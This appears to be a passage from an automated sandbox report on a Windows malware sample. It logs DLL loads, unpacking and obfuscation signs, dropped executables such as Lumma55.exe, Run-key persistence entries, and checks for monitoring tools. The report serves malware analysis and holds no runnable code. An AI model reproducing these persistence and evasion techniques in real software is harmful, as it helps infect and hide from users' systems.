Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1905152 > 1048576
Source: file.exe Static PE information: Raw size of wajwbeif is bigger than: 0x100000 < 0x19f400
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 3f81b82714.exe, 0000001D.00000003.2804023257.0000000004A90000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wajwbeif:EW;joqbkyeg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wajwbeif:EW;joqbkyeg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.520000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wajwbeif:EW;joqbkyeg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wajwbeif:EW;joqbkyeg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Unpacked PE file: 6.2.Lumma55.exe.760000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jobzmdtd:EW;izjuqqoh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jobzmdtd:EW;izjuqqoh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Unpacked PE file: 9.2.80c14d0add.exe.eb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ojfapqbx:EW;uhwqlooz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ojfapqbx:EW;uhwqlooz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Unpacked PE file: 10.2.8e3ce0163b.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kdrhrxjp:EW;yfkrgjas:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kdrhrxjp:EW;yfkrgjas:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Unpacked PE file: 25.2.80c14d0add.exe.eb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ojfapqbx:EW;uhwqlooz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ojfapqbx:EW;uhwqlooz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Unpacked PE file: 33.2.8e3ce0163b.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kdrhrxjp:EW;yfkrgjas:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kdrhrxjp:EW;yfkrgjas:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe Unpacked PE file: 34.2.d199ee6df3.exe.10000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xkihckyz:EW;bnqhchfv:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xkihckyz:EW;bnqhchfv:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.5.dr Static PE information: real checksum: 0x2a9c7e should be: 0x2ac924
Source: random[1].exe1.5.dr Static PE information: real checksum: 0x1c0bf3 should be: 0x1c5433
Source: 3f81b82714.exe.5.dr Static PE information: real checksum: 0x2a9c7e should be: 0x2ac924
Source: Lumma55[1].exe.5.dr Static PE information: real checksum: 0x1d0a2b should be: 0x1d983c
Source: d199ee6df3.exe.5.dr Static PE information: real checksum: 0x4378fd should be: 0x43c840
Source: 8e3ce0163b.exe.5.dr Static PE information: real checksum: 0x1d1c39 should be: 0x1cb859
Source: 80c14d0add.exe.5.dr Static PE information: real checksum: 0x1c0bf3 should be: 0x1c5433
Source: Lumma55.exe.5.dr Static PE information: real checksum: 0x1d0a2b should be: 0x1d983c
Source: file.exe Static PE information: real checksum: 0x1db114 should be: 0x1e0af4
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1db114 should be: 0x1e0af4
Source: random[1].exe0.5.dr Static PE information: real checksum: 0x1d1c39 should be: 0x1cb859
Source: random[2].exe.5.dr Static PE information: real checksum: 0x4378fd should be: 0x43c840
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: wajwbeif
Source: file.exe Static PE information: section name: joqbkyeg
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: wajwbeif
Source: skotes.exe.0.dr Static PE information: section name: joqbkyeg
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.5.dr Static PE information: section name:
Source: random[1].exe.5.dr Static PE information: section name: .idata
Source: random[1].exe.5.dr Static PE information: section name: ylrxalyq
Source: random[1].exe.5.dr Static PE information: section name: rdqnkdmr
Source: random[1].exe.5.dr Static PE information: section name: .taggant
Source: 3f81b82714.exe.5.dr Static PE information: section name:
Source: 3f81b82714.exe.5.dr Static PE information: section name: .idata
Source: 3f81b82714.exe.5.dr Static PE information: section name: ylrxalyq
Source: 3f81b82714.exe.5.dr Static PE information: section name: rdqnkdmr
Source: 3f81b82714.exe.5.dr Static PE information: section name: .taggant
Source: Lumma55[1].exe.5.dr Static PE information: section name:
Source: Lumma55[1].exe.5.dr Static PE information: section name: .idata
Source: Lumma55[1].exe.5.dr Static PE information: section name:
Source: Lumma55[1].exe.5.dr Static PE information: section name: jobzmdtd
Source: Lumma55[1].exe.5.dr Static PE information: section name: izjuqqoh
Source: Lumma55[1].exe.5.dr Static PE information: section name: .taggant
Source: Lumma55.exe.5.dr Static PE information: section name:
Source: Lumma55.exe.5.dr Static PE information: section name: .idata
Source: Lumma55.exe.5.dr Static PE information: section name:
Source: Lumma55.exe.5.dr Static PE information: section name: jobzmdtd
Source: Lumma55.exe.5.dr Static PE information: section name: izjuqqoh
Source: Lumma55.exe.5.dr Static PE information: section name: .taggant
Source: random[2].exe.5.dr Static PE information: section name:
Source: random[2].exe.5.dr Static PE information: section name: .rsrc
Source: random[2].exe.5.dr Static PE information: section name: .idata
Source: random[2].exe.5.dr Static PE information: section name:
Source: random[2].exe.5.dr Static PE information: section name: xkihckyz
Source: random[2].exe.5.dr Static PE information: section name: bnqhchfv
Source: random[2].exe.5.dr Static PE information: section name: .taggant
Source: d199ee6df3.exe.5.dr Static PE information: section name:
Source: d199ee6df3.exe.5.dr Static PE information: section name: .rsrc
Source: d199ee6df3.exe.5.dr Static PE information: section name: .idata
Source: d199ee6df3.exe.5.dr Static PE information: section name:
Source: d199ee6df3.exe.5.dr Static PE information: section name: xkihckyz
Source: d199ee6df3.exe.5.dr Static PE information: section name: bnqhchfv
Source: d199ee6df3.exe.5.dr Static PE information: section name: .taggant
Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: .idata
Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: kdrhrxjp
Source: random[1].exe0.5.dr Static PE information: section name: yfkrgjas
Source: random[1].exe0.5.dr Static PE information: section name: .taggant
Source: 8e3ce0163b.exe.5.dr Static PE information: section name:
Source: 8e3ce0163b.exe.5.dr Static PE information: section name: .idata
Source: 8e3ce0163b.exe.5.dr Static PE information: section name:
Source: 8e3ce0163b.exe.5.dr Static PE information: section name: kdrhrxjp
Source: 8e3ce0163b.exe.5.dr Static PE information: section name: yfkrgjas
Source: 8e3ce0163b.exe.5.dr Static PE information: section name: .taggant
Source: random[1].exe1.5.dr Static PE information: section name:
Source: random[1].exe1.5.dr Static PE information: section name: .idata
Source: random[1].exe1.5.dr Static PE information: section name:
Source: random[1].exe1.5.dr Static PE information: section name: ojfapqbx
Source: random[1].exe1.5.dr Static PE information: section name: uhwqlooz
Source: random[1].exe1.5.dr Static PE information: section name: .taggant
Source: 80c14d0add.exe.5.dr Static PE information: section name:
Source: 80c14d0add.exe.5.dr Static PE information: section name: .idata
Source: 80c14d0add.exe.5.dr Static PE information: section name:
Source: 80c14d0add.exe.5.dr Static PE information: section name: ojfapqbx
Source: 80c14d0add.exe.5.dr Static PE information: section name: uhwqlooz
Source: 80c14d0add.exe.5.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 8_3_05A4EE42 push ecx; retf 8_3_05A4EE68
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 8_3_05A4EE42 push ecx; retf 8_3_05A4EE68
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 8_3_05A4EE42 push ecx; retf 8_3_05A4EE68
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 8_3_05A4EE42 push ecx; retf 8_3_05A4EE68
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 8_3_0134503A push ebp; iretd 8_3_01345041
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 8_3_01347C84 push edi; retf 8_3_01347C94
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 8_3_0134DA29 push ss; retf 8_3_0134DA2A
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 8_3_05A4EE42 push ecx; retf 8_3_05A4EE68
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 8_3_05A4EE42 push ecx; retf 8_3_05A4EE68
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008761D4 push eax; iretd 10_3_008761D9
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008761DC push cs; iretd 10_3_008761DD
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_00876CE8 pushfd ; iretd 10_3_00876CED
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_0087652C push esp; retf 10_3_00876531
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_0086C354 push eax; ret 10_3_0086C355
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_0086CB54 push eax; retf 10_3_0086CB55
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_00875F54 push esp; retf 10_3_00875F55
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_0086C350 push eax; ret 10_3_0086C351
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_0086CB50 push eax; retf 10_3_0086CB51
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_0086C364 pushad ; ret 10_3_0086C365
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_0086CB64 pushad ; retf 10_3_0086CB65
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_0086C360 pushad ; ret 10_3_0086C361
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_0086CB60 pushad ; retf 10_3_0086CB61
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_0086C368 push 680086C3h; ret 10_3_0086C36D
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_0086CB68 push 680086CBh; retf 10_3_0086CB6D
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E0618 push 2335C5A8h; iretd 10_3_008E066D
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E0618 push 2335C5A8h; iretd 10_3_008E066D
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008DFC67 push eax; iretd 10_3_008DFC88
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E067E push 2335C5A8h; iretd 10_3_008E066D
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008E067E push 2335C5A8h; iretd 10_3_008E066D
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008DFB4A push eax; iretd 10_3_008DFC64
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Code function: 10_3_008DFB4A push eax; iretd 10_3_008DFC88
Source: file.exe Static PE information: section name: entropy: 7.984612617096636
Source: file.exe Static PE information: section name: wajwbeif entropy: 7.9543470293657474
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.984612617096636
Source: skotes.exe.0.dr Static PE information: section name: wajwbeif entropy: 7.9543470293657474
Source: random[1].exe.5.dr Static PE information: section name: entropy: 7.7413384004914265
Source: 3f81b82714.exe.5.dr Static PE information: section name: entropy: 7.7413384004914265
Source: Lumma55[1].exe.5.dr Static PE information: section name: entropy: 7.97509167370507
Source: Lumma55[1].exe.5.dr Static PE information: section name: jobzmdtd entropy: 7.954231338425638
Source: Lumma55.exe.5.dr Static PE information: section name: entropy: 7.97509167370507
Source: Lumma55.exe.5.dr Static PE information: section name: jobzmdtd entropy: 7.954231338425638
Source: random[2].exe.5.dr Static PE information: section name: xkihckyz entropy: 7.95513067366179
Source: d199ee6df3.exe.5.dr Static PE information: section name: xkihckyz entropy: 7.95513067366179
Source: random[1].exe0.5.dr Static PE information: section name: entropy: 7.979080812308706
Source: random[1].exe0.5.dr Static PE information: section name: kdrhrxjp entropy: 7.9543806850407694
Source: 8e3ce0163b.exe.5.dr Static PE information: section name: entropy: 7.979080812308706
Source: 8e3ce0163b.exe.5.dr Static PE information: section name: kdrhrxjp entropy: 7.9543806850407694
Source: random[1].exe1.5.dr Static PE information: section name: ojfapqbx entropy: 7.95494290391799
Source: 80c14d0add.exe.5.dr Static PE information: section name: ojfapqbx entropy: 7.95494290391799
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Lumma55[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 67baab2438.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8e3ce0163b.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 80c14d0add.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3f81b82714.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Window searched: window name: RegmonClass Jump to behavior
